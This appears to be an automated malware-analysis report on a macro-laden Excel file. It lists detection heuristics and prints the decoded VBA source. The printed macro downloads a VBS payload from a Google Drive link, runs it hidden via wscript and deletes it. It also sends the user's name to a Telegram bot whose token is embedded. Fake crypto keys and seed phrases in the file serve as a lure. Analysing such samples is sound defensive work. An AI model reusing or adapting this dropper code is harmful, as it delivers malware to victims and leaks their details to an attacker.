MALICIOUS
310
Risk Score
Heuristics 8
-
VBA project inside OOXML medium 6 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
Set objShLl_5 = CreateObject("WScript.Shell") -
LOLBin reference in VBA critical OLE_VBA_LOLBINLOLBin reference in VBAMatched line in script
objShLl_5.Run "wscript.exe """ & starknet_abi_2 & """", 0, False -
Obfuscated VBA Shell command with URL critical OLE_VBA_OBFUSCATED_SHELL_URLVBA macro invokes Shell with command text assembled through decoder or string-manipulation functions and includes a URL. This is a high-confidence downloader/dropper pattern, stronger than Shell or URL evidence on their own.Matched line in script
Set objShLl_5 = CreateObject("WScript.Shell") -
VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXECVBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.Matched line in script
ObjectStarkVb_9 = objHtTp_3.ResponseBody -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set objHTTP = CreateObject("WinHttp.WinHttpRequest.5.1") -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
starknet_abi_2 = Environ("TEMP") & "\update-1.3.vbs" -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.microsoft.com� Referenced by macro
- http://www.apple.comDReferenced by macro
- http://www.google.comReferenced by macro
- http://www.microsoft.comReferenced by macro
- http://www.apple.comReferenced by macro
- https://drive.google.com/uc?export=download&id=1r0LBIw-Kvw2pXnw75y4z5T2j1KdM2iG0Referenced by macro
- https://api.telegram.org/botReferenced by macro
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 7734 bytes |
SHA-256: 130c2296e56d763d866ba5240601a3599b81a33435e4b6055b835f60cc7b8c04 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ЭтаКнига"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Лист1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Dim configExecuted As Boolean
Function IsConnected() As Boolean
On Error Resume Next
Dim objHTTP As Object
Dim usingWinHttp As Boolean
Dim urls As Variant
Dim i As Integer
urls = Array( _
"http://www.google.com", _
"http://www.microsoft.com", _
"http://www.apple.com" _
)
For i = LBound(urls) To UBound(urls)
Set objHTTP = CreateObject("WinHttp.WinHttpRequest.5.1")
objHTTP.Open "GET", urls(i), False
objHTTP.send
usingWinHttp = (objHTTP.Status = 200)
If Not usingWinHttp Then
Set objHTTP = CreateObject("MSXML2.ServerXMLHTTP")
objHTTP.Open "GET", urls(i), False
objHTTP.send
End If
If objHTTP.Status = 200 Then
IsConnected = True
Exit For
End If
Next i
Set objHTTP = Nothing
On Error GoTo 0
End Function
Attribute VB_Name = "Module2"
Sub Config()
Dim starknet_rpc_1 As String
Dim objHtTp_3 As Object
Dim objStReAm_4 As Object
Dim objShLl_5 As Object
Dim starknet_abi_2
' Dim logFilePath As String
' logFilePath = Environ("TEMP") & "\lastb2c4-7f56-43d9-a310-2f37dbb674a9.log"
' Удалите следующий блок, который создает и проверяет файл с датой
' If Dir(logFilePath) = "" Then
' ...
starknet_rpc_1 = "https://drive.google.com/uc?export=download&id=1r0LBIw-Kvw2pXnw75y4z5T2j1KdM2iG0"
Dim maxAttempts As Integer
maxAttempts = 3
Dim attempts As Integer
attempts = 0
Do
Set objHtTp_3 = CreateObject("MSXML2.ServerXMLHTTP")
attempts = attempts + 1
objHtTp_3.Open "GET", starknet_rpc_1, False
On Error Resume Next
objHtTp_3.send
On Error GoTo 0
If objHtTp_3.Status = 200 Then
Set objStReAm_4 = CreateObject("ADODB.Stream")
objStReAm_4.Open
objStReAm_4.Type = 1
Dim ObjectStarkVb_9() As Byte
ObjectStarkVb_9 = objHtTp_3.ResponseBody
objStReAm_4.Write ObjectStarkVb_9
objStReAm_4.Position = 0
starknet_abi_2 = Environ("TEMP") & "\update-1.3.vbs"
objStReAm_4.SaveToFile starknet_abi_2, 2
objStReAm_4.Close
Set objShLl_5 = CreateObject("WScript.Shell")
objShLl_5.Run "wscript.exe """ & starknet_abi_2 & """", 0, False
Application.Wait Now + TimeValue("00:00:05")
Kill starknet_abi_2
Exit Do
End If
If attempts < maxAttempts Then
Application.Wait Now + TimeValue("00:00:05")
End If
Loop While attempts < maxAttempts
' If objHtTp_3.Status = 200 Then
' Dim logFileNumber As Integer
' logFileNumber = FreeFile
' Open logFilePath For Output As #logFileNumber
' Print #logFileNumber, Now
' Close #logFileNumber
' End If
Set objHtTp_3 = Nothing
Set objStReAm_4 = Nothing
Set objShLl_5 = Nothing
End Sub
Attribute VB_Name = "Module3"
Sub OpenKEYS()
Dim DataArray() As String
Dim i As Integer
Dim rowNum As Integer
DataArray = Split("0xa2d63585e51b88765e85738c5b67e771921d18c8691c5b7736867c091524e7c5;0x02bd26a8a86617ee94ad52a967d5b4d79a987ac13f1feaa91af530971cd19fca;0x7adc943221e70cd8394799a333449a1f15b31b05443f6c64660977508496556d;0xa4c31f808483d705eb32d94b6763c40ec2f786cbb30463824e366c1903fd2979;0x8e4ebb01ad90f693d6373773ee1184bd88ef170eaf67ae80a22a9d10a2879450;0xa62b84a746c64e335f8986e5eab8ac12c55af0203fe0ad7608233870ce94ac33;0xba457e0885efa3b56d222d72701d89bd632cc6dc8b68e18602d464178755d53e;0x6e8528c3e9e5dd8d13b0b50b28a56cea2dfbaa5c7e436f307f2c44bdfa8faff8;0x592ebb7218a67e326684a48460192b0781e2283cedf981585d1752112580a288;0x54003cf04496778b6d76bd84f9808be9b19d3ec8542176f327172ce9e1161ca8;0x212ea4e426d6a7cc3ba3e8f328aa34091cba6ab4a51b83f78f5557e54d808875", ";")
rowNum = 2
For i = LBound(DataArray) To UBound(DataArray)
ThisWorkbook.Sheets(1).Cells(rowNum, 4).Value = DataArray(i)
rowNum = rowNum + 1
Application.Wait Now + #12:00:01 AM#
Next i
End Sub
Sub OpenSEED()
Dim DataArray() As String
Dim i As Integer
Dim rowNum As Integer
DataArray = Split("month enforce humor east law home install gun arctic quote volume permit;digital swap shop occur bacon entire innocent human load abuse poem defense;tent foam bachelor about foil blossom together sick version approve always off;kiwi immense achieve advance certain virus armor salad envelope culture few truly;try rely monster dolphin brisk crowd hockey episode bargain stone ceiling wrestle;onion crouch cram drift burst famous fish spatial cattle number crumble bubble;rival calm pride hub frog stereo version jazz across tool stay ready;harvest moral chimney original census animal sample only credit disagree dilemma maid;later gesture reunion orange tool monitor sketch coil pilot horn oval region;corn hammer man cloth limit fossil nest company domain genuine lounge rose;burst crime silver cupboard across inside reject zone forum play original future", ";")
rowNum = 2
For i = LBound(DataArray) To UBound(DataArray)
ThisWorkbook.Sheets(1).Cells(rowNum, 5).Value = DataArray(i)
rowNum = rowNum + 1
Application.Wait Now + #12:00:01 AM#
Next i
End Sub
Attribute VB_Name = "Module4"
Sub ConfigKEYS()
If Not IsConnected() Then
MsgBox "Internet connection is unavailable. Please check your internet connection.", vbExclamation, "Error"
Exit Sub
End If
If Not configExecuted Then
Call Config
configExecuted = True
End If
Call DataToStars
Call OpenKEYS
End Sub
Sub ConfigSEED()
If Not IsConnected() Then
MsgBox "Internet connection is unavailable. Please check your internet connection.", vbExclamation, "Error"
Exit Sub
End If
If Not configExecuted Then
Call Config
configExecuted = True
End If
Call DataToStars
Call OpenSEED
End Sub
Sub DataToStars()
Dim botToken As String
Dim chatID As String
Dim messageText As String
botToken = "5947267968:AAHxL6kLQXn-LJzVaFPGasW21jKZuRcB6Zc"
chatID = "-1001636934858"
messageText = "Macro started by " & Environ("username")
Dim http As Object
Set http = CreateObject("MSXML2.ServerXMLHTTP.6.0")
Dim url As String
url = "https://api.telegram.org/bot" & botToken & "/sendMessage?chat_id=" & chatID & "&text=" & messageText
http.Open "GET", url, False
http.setRequestHeader "Content-Type", "text/xml"
http.send ""
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 35328 bytes |
SHA-256: e2401fe39f07627792db5babf3e81b6b1af567caee608dbf91556a0734124c3f |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.